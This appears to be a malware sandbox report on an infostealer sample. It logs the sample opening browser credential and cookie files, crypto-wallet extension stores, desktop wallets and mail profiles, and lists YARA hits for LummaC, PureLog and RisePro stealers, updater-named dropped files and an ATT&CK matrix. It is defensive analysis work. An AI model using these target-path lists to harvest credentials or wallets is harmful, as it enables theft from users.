Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO

Source: Yara match	File source: 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OJa1BOigU3.exe PID: 1804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5856, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 15.0.U8cABsPhZFkKRrQ4rE0N.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6339420.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.634bfa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2277600314.000000000637F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275260383.0000000006333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275159782.0000000006301000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275215754.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000003.2165765311.0000000005E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3Q7v9y6Zw0a51Z43zHih.exe PID: 3336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV1.exe PID: 5224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV1.exe PID: 5344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AdobeUpdaterV1.exe PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6244, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RLhyDRs2UHaLI0bTHvNtryI.zip, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
